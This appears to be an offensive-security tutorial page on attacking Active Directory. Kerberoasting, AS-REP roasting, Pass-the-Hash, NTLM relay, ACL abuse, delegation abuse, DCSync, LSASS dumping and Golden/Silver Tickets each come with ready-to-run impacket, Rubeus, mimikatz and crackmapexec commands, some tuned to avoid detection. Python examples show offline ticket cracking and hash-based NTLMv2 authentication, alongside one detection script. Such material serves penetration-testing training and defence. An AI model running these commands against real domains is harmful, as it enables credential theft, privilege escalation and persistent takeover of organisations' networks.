
Active Directory Exploitation

Kerberoasting, Pass-the-Hash, DCSync, and the path to Domain Admin

22 min read · Updated 2026-04-18
#kerberoasting #pass-the-hash #dcsync #mimikatz #golden-ticket #ad
TL;DR
  • Kerberoasting requests service tickets and cracks them offline — no elevated privileges needed
  • Pass-the-Hash uses captured NTLM hashes to authenticate without knowing the plaintext password
  • DCSync mimics a domain controller's replication request to pull password hashes from the DC; it needs the directory replication rights that Domain Admins, Enterprise Admins and DC computer accounts hold by default
  • Golden Tickets forge TGTs using the krbtgt hash; the persistence survives every password change except a double reset of krbtgt itself
  • The attack path is rarely one exploit — it's a chain: low user > service account > constrained delegation > Domain Admin

Prerequisites

  • Completed: Active Directory Enumeration (you need the map before you attack)
  • Valid domain user credentials
  • BloodHound data showing attack paths

Lab: HackTheBox — Forest (AS-REP Roasting), Active (Kerberoasting), Resolute (DNS admin > DA), Return (LDAP credential leak). These four machines cover the most common AD attack chains.


Kerberoasting

Any domain user can request a Kerberos service ticket for any account with an SPN. The ticket is encrypted under a key derived from the service account's password (the NT hash for RC4, a PBKDF2-derived key for AES). You crack it offline, with zero interaction with the service account itself.

  • Step 1, find SPNs: impacket GetUserSPNs, or an LDAP query for servicePrincipalName=*
  • Step 2, request tickets: one KRB_TGS_REQ to the KDC per SPN
  • Step 3, extract hashes: lines of the form $krb5tgs$23$...
  • Step 4, crack offline: hashcat -m 13100
  • Step 5, authenticate: use the cracked password
```bash
# Kerberoast from Linux: request a service ticket for every SPN-bearing user
impacket-GetUserSPNs corp.local/user:password -dc-ip DC_IP -request

# Same, but write the hashcat-format lines to a file
impacket-GetUserSPNs corp.local/user:password -dc-ip DC_IP -request -outputfile hashes.txt

# Crack RC4 (etype 23) tickets: $krb5tgs$23$...
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

# AES tickets (etype 17/18) come back when the account has RC4 disabled; they crack
# orders of magnitude slower because the key is PBKDF2-derived
hashcat -m 19600 hashes.txt /usr/share/wordlists/rockyou.txt   # etype 17, $krb5tgs$17$
hashcat -m 19700 hashes.txt /usr/share/wordlists/rockyou.txt   # etype 18, $krb5tgs$18$
```

```powershell
# Kerberoast from Windows with Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt

# Target a specific user
.\Rubeus.exe kerberoast /user:svc_sql /outfile:hashes.txt

# Request RC4 only from accounts that do not support AES, so the downgrade
# is not visible as an unusual encryption type in event 4769
.\Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
```
Prioritise High-Privilege SPNs

Service accounts with SPNs that are also members of Domain Admins, or hold DA-equivalent rights, are your primary targets. BloodHound's prebuilt "Find Kerberoastable Members of High Value Groups" query lists them instantly; crack those first rather than the whole output file.


AS-REP Roasting

Accounts with "Do not require Kerberos preauthentication" enabled get an AS-REP without first proving knowledge of their password (no encrypted timestamp in the AS-REQ). The AS-REP's enc-part is encrypted under the user's long-term key (the NT hash for RC4), so anyone who can name the account can request it and crack it offline.

```bash
# Unauthenticated: try each name in users.txt; accounts without preauth hand back a roastable AS-REP
impacket-GetNPUsers corp.local/ -dc-ip DC_IP -no-pass -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt

# Authenticated: let LDAP find the accounts with DONT_REQ_PREAUTH set and request for all of them
impacket-GetNPUsers corp.local/user:password -dc-ip DC_IP -request -format hashcat -outputfile asrep_hashes.txt

# Crack ($krb5asrep$23$ lines)
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
```

```powershell
# Rubeus writes john format by default; ask for hashcat's
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
.\Rubeus.exe asreproast /user:targetuser /format:hashcat /outfile:asrep.txt
```
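Added example (not code from the page, from impacket or from hashcat): the offline cracking step behind both the Kerberoasting and the AS-REP Roasting sections, written out in Python so the ticket maths is visible. It constructs its own sample $krb5tgs$23$ and $krb5asrep$23$ lines (the tickets, SPN, account names, realm and passwords are made up) with RFC 4757 RC4-HMAC encryption, then recovers the passwords from a tiny wordlist the way hashcat -m 13100 and -m 18200 do: derive K1 from the candidate's NT hash, K3 from the ticket's checksum, RC4-decrypt, and accept the candidate whose HMAC matches. MD4 is implemented inline because hashlib often lacks it on OpenSSL 3 builds.

```python
"""Offline cracking of RC4-HMAC (etype 23) Kerberoast and AS-REP roast hashes: the work
hashcat -m 13100 / -m 18200 does, written out to show why the KDC is never contacted again."""
import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often unavailable under OpenSSL 3."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    rounds = (  # (boolean function, additive constant, word order, shift schedule)
        (lambda x, y, z: (x & y) | (~x & z), 0, range(16), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = rotl((a + func(b, c, d) + x[k] + const) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); for etype 23 it is also the Kerberos long-term key."""
    return md4(password.encode("utf-16le"))


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes):
    """RFC 4757 encryption as the KDC performs it; returns (checksum, ciphertext).
    T=2 for a service ticket, T=8 for the AS-REP enc-part (RFC 4757 maps key usage 3 to 8)."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    data = confounder + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum, rc4(k3, data)


def parse_hash(line: str) -> dict:
    """The two hashcat formats the tools above write (RC4 only)."""
    if line.startswith("$krb5tgs$23$"):           # $krb5tgs$23$*user$REALM$spn*$checksum$ciphertext
        head, checksum, ciphertext = line.rsplit("$", 2)
        user, realm, spn = head.split("$", 3)[3].strip("*").split("$", 2)
        usage = 2
    elif line.startswith("$krb5asrep$23$"):       # $krb5asrep$23$user@REALM:checksum$ciphertext
        ident, rest = line[len("$krb5asrep$23$"):].split(":", 1)
        checksum, ciphertext = rest.split("$", 1)
        user, realm = ident.split("@", 1)
        spn, usage = None, 8
    else:
        raise ValueError("only etype 23 handled here; AES tickets need hashcat -m 19600/19700")
    return {"usage": usage, "user": user, "realm": realm, "spn": spn,
            "checksum": bytes.fromhex(checksum), "ciphertext": bytes.fromhex(ciphertext)}


def crack(line: str, wordlist):
    """Per candidate: K1 from its NT hash, K3 from the ticket checksum, RC4-decrypt, verify the HMAC."""
    h = parse_hash(line)
    usage = struct.pack("<I", h["usage"])
    for candidate in wordlist:
        k1 = hmac.new(nt_hash(candidate), usage, hashlib.md5).digest()
        k3 = hmac.new(k1, h["checksum"], hashlib.md5).digest()
        data = rc4(k3, h["ciphertext"])             # confounder || plaintext if the key was right
        if hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), h["checksum"]):
            return candidate
    return None


# Constructed samples (not real tickets): short stand-ins for the ASN.1 EncTicketPart / EncASRepPart,
# encrypted under weak passwords with fixed confounders so the lines are reproducible.
_cs, _ct = rc4_hmac_encrypt(nt_hash("Summer2024!"), 2, b"EncTicketPart stand-in", bytes(range(8)))
TGS_LINE = f"$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*${_cs.hex()}${_ct.hex()}"
_cs, _ct = rc4_hmac_encrypt(nt_hash("Welcome1"), 8, b"EncASRepPart stand-in", bytes(8))
ASREP_LINE = f"$krb5asrep$23$svc_backup@CORP.LOCAL:{_cs.hex()}${_ct.hex()}"
WORDLIST = ["123456", "Password1", "Welcome1", "Summer2024!"]

if __name__ == "__main__":
    print("svc_sql    ->", crack(TGS_LINE, WORDLIST))     # Summer2024!
    print("svc_backup ->", crack(ASREP_LINE, WORDLIST))   # Welcome1
```

Two things the command lines hide: the only secret in play is the NT hash, so a wordlist hit is immediately usable for Pass-the-Hash as well as for a Kerberos logon; and the AES formats differ not just in hashcat mode but in key derivation (PBKDF2 over the password, 4096 iterations), which is where their cracking cost comes from.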

Pass-the-Hash (PtH)

Windows NTLM authentication doesn't require the plaintext password — it requires the NT hash. If you capture a user's NTLM hash, you can authenticate as them directly.

```bash
# CrackMapExec: spray the hash across a subnet to see where it authenticates (local admin shows as "Pwn3d!")
crackmapexec smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c'

# Impacket: -hashes takes LM:NT; leave LM empty and only the NT half is used
impacket-psexec corp.local/Administrator@DC_IP -hashes ':8846f7eaee8fb117ad06bdd830b7586c'
impacket-wmiexec corp.local/Administrator@DC_IP -hashes ':8846f7eaee8fb117ad06bdd830b7586c'
impacket-smbexec corp.local/Administrator@DC_IP -hashes ':8846f7eaee8fb117ad06bdd830b7586c'

# Evil-WinRM: WinRM / PowerShell remoting with the NT hash alone (needs 5985/5986 reachable)
evil-winrm -i DC_IP -u Administrator -H '8846f7eaee8fb117ad06bdd830b7586c'
```
LM vs NT Hash

Dump output (secretsdump, Mimikatz) shows LM_hash:NT_hash. LM hashes are legacy and almost always absent; an absent LM hash appears as aad3b435b51404eeaad3b435b51404ee, which is the LM hash of the empty password. For PtH only the NT hash (right side of the colon) matters: NTLMv2 authentication is computed from it alone, which is exactly why the hash is password-equivalent.
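Added example, not from the page or from any of the tools it names: the NTLMv2 exchange computed from the NT hash alone, which is what makes Pass-the-Hash work and why the LM half can be ignored. The dump line is constructed in secretsdump's LM:NT shape around the NT hash from the MS-NLMP 4.2.4 test vector (user "User", domain "Domain", fixed challenges, timestamp 0),. so the intermediate values can be checked against the specification; both the client-side and the verifier-side functions take only the hash.

```python
"""Pass-the-Hash from first principles: NTLMv2 authentication is computed from the NT hash
alone, so whoever holds the hash can answer any challenge. Client side and verifier side
below use only the 16-byte hash; no password appears anywhere."""
import hashlib
import hmac
import struct

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password: what "no LM hash" looks like


def nt_from_dump(lm_nt: str):
    """Split the LM:NT pair secretsdump / Mimikatz print; PtH only needs the NT half."""
    lm, nt = lm_nt.strip().lower().split(":")
    return bytes.fromhex(nt), lm != EMPTY_LM      # (NT hash, a real LM hash is present)


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 (MS-NLMP 3.3.2): HMAC-MD5 over UPPER(user) || domain, keyed with the NT hash."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def av_pair(av_id: int, value: str) -> bytes:
    """One AV_PAIR of the server's TargetInfo (id, byte length, UTF-16LE value)."""
    data = value.encode("utf-16le")
    return struct.pack("<HH", av_id, len(data)) + data


def ntlmv2_temp(client_nonce: bytes, timestamp: int, target_info: bytes) -> bytes:
    """The 'temp' blob: RespType, HiRespType, Reserved(6), Time(8), ClientChallenge(8), Reserved(4), AvPairs, Reserved(4)."""
    return b"\x01\x01" + bytes(6) + struct.pack("<Q", timestamp) + client_nonce + bytes(4) + target_info + bytes(4)


def ntlmv2_response(nt_hash: bytes, user: str, domain: str, server_challenge: bytes, temp: bytes) -> bytes:
    """NtChallengeResponse = NTProofStr || temp, what a PtH client puts in the AUTHENTICATE message."""
    proof = hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + temp, hashlib.md5).digest()
    return proof + temp


def lmv2_response(nt_hash: bytes, user: str, domain: str, server_challenge: bytes, client_nonce: bytes) -> bytes:
    """LmChallengeResponse; keyed with the same NTOWFv2 (LMOWFv2 is identical to NTOWFv2)."""
    return hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + client_nonce, hashlib.md5).digest() + client_nonce


def verify_ntlmv2(stored_nt_hash: bytes, user: str, domain: str, server_challenge: bytes, nt_response: bytes) -> bool:
    """Verifier side (a DC via Netlogon, or a local SAM): recompute NTProofStr from the stored hash."""
    proof, temp = nt_response[:16], nt_response[16:]
    expected = hmac.new(ntowf_v2(stored_nt_hash, user, domain), server_challenge + temp, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


# Constructed dump line in secretsdump's LM:NT shape, built around the NT hash of "Password"
# from the MS-NLMP 4.2.4 test vector; the challenges and TargetInfo are that vector's too.
DUMP_LINE = "aad3b435b51404eeaad3b435b51404ee:a4f49c406510bdcab6824ee7c30fd852"
NT_HASH, HAS_LM = nt_from_dump(DUMP_LINE)
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
CLIENT_NONCE = bytes.fromhex("aaaaaaaaaaaaaaaa")
TARGET_INFO = av_pair(0x0002, "Domain") + av_pair(0x0001, "Server") + struct.pack("<HH", 0, 0)  # MsvAvEOL
TEMP = ntlmv2_temp(CLIENT_NONCE, 0, TARGET_INFO)
NT_RESPONSE = ntlmv2_response(NT_HASH, "User", "Domain", SERVER_CHALLENGE, TEMP)

if __name__ == "__main__":
    print("LM hash present:", HAS_LM)
    print("NTProofStr:", NT_RESPONSE[:16].hex())
    print("verifier accepts:", verify_ntlmv2(NT_HASH, "User", "Domain", SERVER_CHALLENGE, NT_RESPONSE))
```

Note what the verifier compares: it never sees a password either, only the same HMAC chain keyed with the stored hash. That symmetry is the whole of PtH, and it is also why NTLM cannot be fixed by a stronger hash function; only disabling NTLM or requiring Kerberos removes it.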


Pass-the-Ticket (PtT)

Kerberos tickets (TGTs and service tickets) can be stolen from memory and used on other machines or passed to tools.

```powershell
# Dump Kerberos tickets from memory (other users' sessions need an elevated context)
.\Rubeus.exe dump /nowrap                          # all tickets, base64 on one line each
.\Rubeus.exe dump /user:Administrator /nowrap      # one user's tickets

# Import a stolen ticket into the current logon session
.\Rubeus.exe ptt /ticket:base64encodedticket

# Verify: the imported TGT / service ticket should now be listed
klist
```

```bash
# From Linux: convert a Rubeus .kirbi to the ccache format Impacket uses (the tool converts either way, by extension)
impacket-ticketConverter ticket.kirbi ticket.ccache
export KRB5CCNAME=/path/to/ticket.ccache

# Target by hostname, not IP: Kerberos needs the name to match the service's SPN
impacket-psexec -k -no-pass corp.local/Administrator@DC.corp.local
```

NTLM Relay Attacks

An NTLM authentication the attacker can sit in the middle of can be forwarded, message by message, to a different target: the victim answers the target's challenge, the attacker keeps the resulting session, and no hash is ever cracked or even seen.

```bash
# Step 1: list hosts where SMB signing is not required (relay to SMB only works there)
crackmapexec smb 192.168.1.0/24 --gen-relay-list targets.txt

# Step 2: start the relay before triggering anything. If Responder runs on the same box, set
#         SMB = Off and HTTP = Off in Responder.conf first so the relay server gets the connections
impacket-ntlmrelayx -tf targets.txt -smb2support

# Step 3: trigger authentication (Responder poisons LLMNR/NBT-NS/mDNS name lookups)
responder -I eth0 -v

# SOCKS mode keeps each relayed session open for interactive use
impacket-ntlmrelayx -tf targets.txt -smb2support -socks
# then drive Impacket tools through it (proxychains pointed at 127.0.0.1:1080), e.g.
proxychains impacket-smbclient -no-pass corp.local/relayed_user@TARGET
```
SMB Signing

SMB signing authenticates every SMB message with a key derived from the session key, which a relaying attacker never learns, so a relayed session to a target that requires signing fails at the first signed message. Only "required" matters: "enabled" (the out-of-the-box state for member servers and workstations) still accepts unsigned sessions. Domain controllers require signing by default, and Windows 11 24H2 and Windows Server 2025 require it for all connections by default, so expect fewer relay targets on current builds.
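Added example, not CrackMapExec's code: a parser for the SecurityMode field of an SMB2 NEGOTIATE response, which is the information --gen-relay-list reduces to a target list, run over constructed responses for three hypothetical hosts (the addresses and host names are made up). It makes the "enabled" versus "required" distinction of the callout concrete.

```python
"""Selecting relay targets from SMB2 NEGOTIATE responses, the information behind
crackmapexec --gen-relay-list. Only the SIGNING_REQUIRED bit blocks relay; Windows
servers always set SIGNING_ENABLED, so that bit says nothing about enforcement."""
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_HEADER_LEN = 64
SIGNING_ENABLED = 0x0001    # SecurityMode bits, MS-SMB2 2.2.4 NEGOTIATE Response
SIGNING_REQUIRED = 0x0002


def build_negotiate_response(security_mode: int, dialect: int = 0x0311) -> bytes:
    """Constructed SMB2 header + NEGOTIATE response body carrying the fields relay selection needs."""
    header = SMB2_MAGIC + struct.pack("<HHIHHIIQIIQ16s",
                                      SMB2_HEADER_LEN, 0, 0, SMB2_NEGOTIATE, 1,   # size, credit charge, status, command, credits
                                      0x00000001, 0, 0, 0, 0, 0, bytes(16))       # SERVER_TO_REDIR, next, msgid, rsvd, tree, session, sig
    body = struct.pack("<HHHH16sIIIIQQHHI",
                       65, security_mode, dialect, 0, bytes(16),                  # size, SecurityMode, dialect, ctx count, server GUID
                       0, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0)          # caps, max sizes, times, sec buffer, ctx offset
    return header + body


def smb2_signing(packet: bytes) -> dict:
    """Read SecurityMode from a NEGOTIATE response; raises on anything that is not one."""
    if packet[:4] != SMB2_MAGIC:
        raise ValueError("not SMB2 (SMB1 keeps signing in its own SecurityMode byte: 0x04 enabled, 0x08 required)")
    command = struct.unpack_from("<H", packet, 12)[0]
    size, mode, dialect = struct.unpack_from("<HHH", packet, SMB2_HEADER_LEN)
    if command != SMB2_NEGOTIATE or size != 65:
        raise ValueError("not an SMB2 NEGOTIATE response")
    return {"dialect": dialect, "enabled": bool(mode & SIGNING_ENABLED), "required": bool(mode & SIGNING_REQUIRED)}


def relay_targets(responses: dict) -> list:
    """Hosts that accept an unsigned session, i.e. where a relayed NTLM authentication works."""
    return [host for host, pkt in responses.items() if not smb2_signing(pkt)["required"]]


# Constructed responses: a DC (required by default), a member server and a workstation that
# only have signing enabled, the usual out-of-the-box state that leaves them relayable.
RESPONSES = {
    "10.0.0.5 (dc01)": build_negotiate_response(SIGNING_ENABLED | SIGNING_REQUIRED),
    "10.0.0.20 (fs01)": build_negotiate_response(SIGNING_ENABLED),
    "10.0.0.77 (ws-alice)": build_negotiate_response(SIGNING_ENABLED, dialect=0x0302),
}

if __name__ == "__main__":
    for host in relay_targets(RESPONSES):      # the same content targets.txt would hold
        print(host)
```

The dialect is recorded because it matters for the other relay direction: relaying to LDAP/LDAPS or HTTP has its own protections (LDAP signing, channel binding) that this SMB check says nothing about, so a host absent from targets.txt can still be a target for ntlmrelayx's other modules.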


ACL Abuse — Privilege Escalation via Misconfigurations

BloodHound finds ACL attack paths. Here's how to exploit the common ones.

GenericAll on a User — Reset Their Password

```powershell
# You have GenericAll on targetuser: reset the password (ActiveDirectory module).
# Noisy and disruptive (the user loses access and event 4724 is logged); GenericAll also lets
# you set an SPN for a targeted Kerberoast, or write msDS-KeyCredentialLink (Shadow Credentials)
Import-Module ActiveDirectory
$SecPassword = ConvertTo-SecureString 'NewPassword123!' -AsPlainText -Force
Set-ADAccountPassword -Identity targetuser -NewPassword $SecPassword -Reset
```

GenericAll on a Group — Add Yourself

```powershell
# You have GenericAll (or write access to the member attribute) on "Domain Admins"
Import-Module ActiveDirectory
Add-ADGroupMember -Identity "Domain Admins" -Members youruser
# The new membership only lands in a fresh TGT: log off and on again (or request a new ticket) before using it
```

WriteDACL — Grant Yourself GenericAll

```powershell
# You have WriteDACL on targetuser: rewrite its ACL to grant yourself GenericAll (PowerView)
Import-Module .\PowerView.ps1
$victim = "targetuser"
$attacker = "youruser"

Add-DomainObjectAcl -TargetIdentity $victim -PrincipalIdentity $attacker -Rights All
# Then continue as in the GenericAll case: password reset, targeted Kerberoast or Shadow Credentials
```

GenericWrite > Shadow Credentials Attack

```bash
# You have GenericWrite on a target account (GenericWrite covers msDS-KeyCredentialLink).
# Needs a DC able to do PKINIT, i.e. one holding a Domain Controller / Kerberos Authentication certificate
pywhisker -d corp.local -u attacker -p 'password' --target targetuser --action add
# pywhisker prints the name of the PFX it wrote and the PFX password; use them below

# Obtain a TGT for the target with the certificate (gettgtpkinit.py is from PKINITtools)
python3 gettgtpkinit.py -cert-pfx cert.pfx -pfx-pass pass corp.local/targetuser tgt.ccache
export KRB5CCNAME=tgt.ccache
impacket-psexec -k -no-pass corp.local/targetuser@DC.corp.local
```

Constrained Delegation Abuse

If a computer or service account has constrained delegation configured (its msDS-AllowedToDelegateTo lists the target services), it can present service tickets to those services on behalf of users. With "protocol transition" enabled (TRUSTED_TO_AUTH_FOR_DELEGATION) it can obtain such a ticket for any user via S4U2Self followed by S4U2Proxy, without that user ever authenticating to it; without protocol transition it needs a forwardable ticket from a user who actually did.

```bash
# Find accounts with constrained delegation (shows the allowed SPNs and whether protocol transition is on)
impacket-findDelegation corp.local/user:password -dc-ip DC_IP

# With the delegating account's hash, request a ticket to one of the allowed services as Administrator.
# Accounts marked "sensitive, cannot be delegated" or in Protected Users cannot be impersonated.
impacket-getST corp.local/svc_account -hashes ':NThash' -spn cifs/DC.corp.local -impersonate Administrator -dc-ip DC_IP

# The service class is not protected by the ticket: if only e.g. http/DC.corp.local is allowed,
# request that and swap the class to the one you need
impacket-getST corp.local/svc_account -hashes ':NThash' -spn http/DC.corp.local -altservice cifs/DC.corp.local -impersonate Administrator -dc-ip DC_IP

# Use the ticket (getST prints the name of the .ccache it saved; newer releases include the SPN and realm in it)
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass corp.local/Administrator@DC.corp.local
```

DCSync — Pulling All Hashes

DCSync issues the same DRSUAPI replication request (GetNCChanges) a Domain Controller would. Any principal holding both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain head (Domain Admins, Enterprise Admins and DC computer accounts by default) can pull every account's secrets from any DC over RPC: remotely, and without touching disk on the DC.

```bash
# DCSync from Linux: -just-dc limits secretsdump to the replication path (without it the tool also
# pulls SAM/LSA over the remote registry). Needs DA or explicit replication rights.
impacket-secretsdump corp.local/Administrator:password@DC_IP -just-dc

# One account only (krbtgt is the one you always want)
impacket-secretsdump corp.local/Administrator:password@DC_IP -just-dc-user krbtgt

# NT hashes only, skipping Kerberos keys and cleartext entries (faster, smaller output)
impacket-secretsdump corp.local/Administrator:password@DC_IP -just-dc-ntlm
```

```powershell
# From Windows with Mimikatz
mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt
mimikatz # lsadump::dcsync /domain:corp.local /all /csv
```
The krbtgt Account

Always dump the krbtgt account. Its key encrypts every TGT and signs the PAC inside it, so with the hash you can forge Golden Tickets: domain-wide access that survives every password change except a double reset of krbtgt itself.


LSASS Credential Dumping

LSASS (Local Security Authority Subsystem Service) holds the credential material of every logged-on user in memory: NT hashes, Kerberos tickets and keys, and, where WDigest caching is enabled, plaintext passwords.

```powershell
# Mimikatz, the classic; needs SeDebugPrivilege (local admin) and no LSA Protection / Credential Guard
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords    # all credential material in LSASS
mimikatz # sekurlsa::tickets           # Kerberos tickets
mimikatz # sekurlsa::wdigest           # cleartext passwords, only if WDigest caching is enabled

# Dump LSASS memory for offline analysis (keeps Mimikatz off the host)
# Method 1: Task Manager > Details > lsass.exe > Create dump file (manual, needs a GUI session)
# Method 2: ProcDump (Sysinternals, signed; the act of dumping lsass is still widely detected)
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Method 3: comsvcs.dll MiniDump export (built in; run from an elevated PowerShell, give a full output path)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Windows\Temp\lsass.dmp full

# Analyse the dump offline
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords
```
LSASS Protected

Two protections block this. LSA Protection (RunAsPPL) runs LSASS as a protected process, so even SYSTEM cannot open it for reading without a signed driver. Credential Guard keeps the derived secrets (NT hashes, TGTs) in the isolated LSA process under virtualization-based security, so what LSASS memory still holds is no longer password-equivalent. Check Credential Guard with Get-ComputerInfo -Property DeviceGuardSecurityServicesRunning (it lists CredentialGuard when active) and LSA Protection via the RunAsPPL value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa.


Golden Ticket — Unlimited Domain Persistence

With the krbtgt hash, you can forge a TGT (Ticket Granting Ticket) for any user, with any group memberships, valid for any duration. This is the golden ticket attack.

```powershell
# Requires: domain SID, the krbtgt NT hash (or, better, its AES256 key via /aes256:), target username.
# Since the 2021 PAC hardening (KB5008380 enforcement) the user must exist and /id must be its real RID.
mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxxx /id:500 /krbtgt:NTLM_HASH_HERE /ticket:golden.kirbi

# Load the ticket into the current session
mimikatz # kerberos::ptt golden.kirbi

# Verify
klist
dir \\DC\C$
```

```bash
# From Linux (writes Administrator.ccache)
impacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain corp.local -user-id 500 Administrator
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass corp.local/Administrator@DC.corp.local
```
Golden Ticket Detection

Forged TGTs tend to stand out: lifetimes far beyond the domain's 10-hour default, PAC group lists or RIDs that do not match the directory, RC4 encryption in an AES-only domain, and service ticket requests (4769) for an account and client that never had a TGT issued (4768). Since the 2021 PAC hardening a ticket for a user that does not exist is rejected outright. Modern EDR flags the rest. The Privileged Access Workstation (PAW) model limits the blast radius by keeping DA credentials off ordinary hosts, which leaves an attacker fewer places to reach krbtgt from in the first place.
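Added example, not from the page: the two correlations in the callout that can be expressed over DC security events, run over constructed event records (accounts, addresses and times are made up; the directory listing stands in for an LDAP query). The "service ticket request without a TGT request" pairing is a standard hunting heuristic assumed here; the rejection of unknown accounts after the PAC hardening is what makes the second check worth alerting on at all.

```python
"""Two golden-ticket indicators from the callout above, run over constructed Windows Security
events (4768 = TGT issued, 4769 = service ticket requested). A forged TGT is never requested
from the KDC, so its service-ticket requests have no matching 4768; and since the 2021 PAC
hardening, a ticket for an account the directory does not know is itself a red flag."""
from datetime import datetime, timedelta

TGT_MAX_LIFETIME = timedelta(hours=10)   # default domain Kerberos policy; adjust to the domain's setting

# Constructed events, not real logs: the few fields the correlation needs. The DC logs IPv4
# clients as "::ffff:10.0.0.77"; normalise that before keying on the address.
EVENTS = [
    {"id": 4768, "time": "2026-04-18T08:01:10", "user": "alice", "ip": "::ffff:10.0.0.77"},
    {"id": 4769, "time": "2026-04-18T08:01:12", "user": "alice", "ip": "10.0.0.77", "service": "cifs/fs01"},
    {"id": 4769, "time": "2026-04-18T09:30:00", "user": "Administrator", "ip": "10.0.0.91", "service": "cifs/dc01"},
    {"id": 4769, "time": "2026-04-18T09:31:00", "user": "sqladmin", "ip": "10.0.0.91", "service": "ldap/dc01"},
]
DIRECTORY_USERS = {"alice", "administrator", "svc_sql", "krbtgt"}   # stand-in for an LDAP user listing


def _key(event: dict) -> tuple:
    return event["user"].lower(), event["ip"].replace("::ffff:", "")


def tgs_without_tgt(events: list, window: timedelta = TGT_MAX_LIFETIME) -> list:
    """4769s whose (account, client) pair has no 4768 within one TGT lifetime before them.
    Feed in events from every DC: the TGT may have been issued by a different DC than the TGS."""
    last_tgt, findings = {}, []
    for e in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(e["time"])
        if e["id"] == 4768:
            last_tgt[_key(e)] = when
        elif e["id"] == 4769:
            seen = last_tgt.get(_key(e))
            if seen is None or when - seen > window:
                findings.append((e["time"], e["user"], _key(e)[1], e["service"], "TGS request without a TGT request"))
    return findings


def unknown_principals(events: list, directory: set) -> list:
    """Ticket activity for accounts that do not exist in the directory."""
    return [(e["time"], e["user"], _key(e)[1], "account not in directory")
            for e in events if e["user"].lower() not in directory]


def report(events: list, directory: set) -> list:
    return sorted(tgs_without_tgt(events) + unknown_principals(events, directory))


if __name__ == "__main__":
    for finding in report(EVENTS, DIRECTORY_USERS):
        print(*finding)
```

The window is what keeps this from drowning in noise: a workstation that renews its TGT on a different DC, or a ticket older than the policy allows, both produce 4769s without a recent local 4768, so the check needs the events of every DC in the domain and a window at least as long as the configured TGT lifetime.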


Silver Ticket

Silver tickets forge service tickets (TGS) using the target service account's key, not krbtgt. They never touch the DC (no 4768/4769 there, only a 4624 logon on the target host), which makes them harder to spot, but each ticket opens exactly one service on one host.

```powershell
# Silver ticket for the CIFS service on one server: /rc4 is the NT hash of the account the service
# runs as (the computer account fileserver$ for CIFS); /target is the host name in the SPN
mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /target:fileserver.corp.local /service:cifs /rc4:SERVICE_ACCOUNT_NTLM_HASH /ticket:silver.kirbi
mimikatz # kerberos::ptt silver.kirbi
dir \\fileserver.corp.local\C$
```

Operational Notes

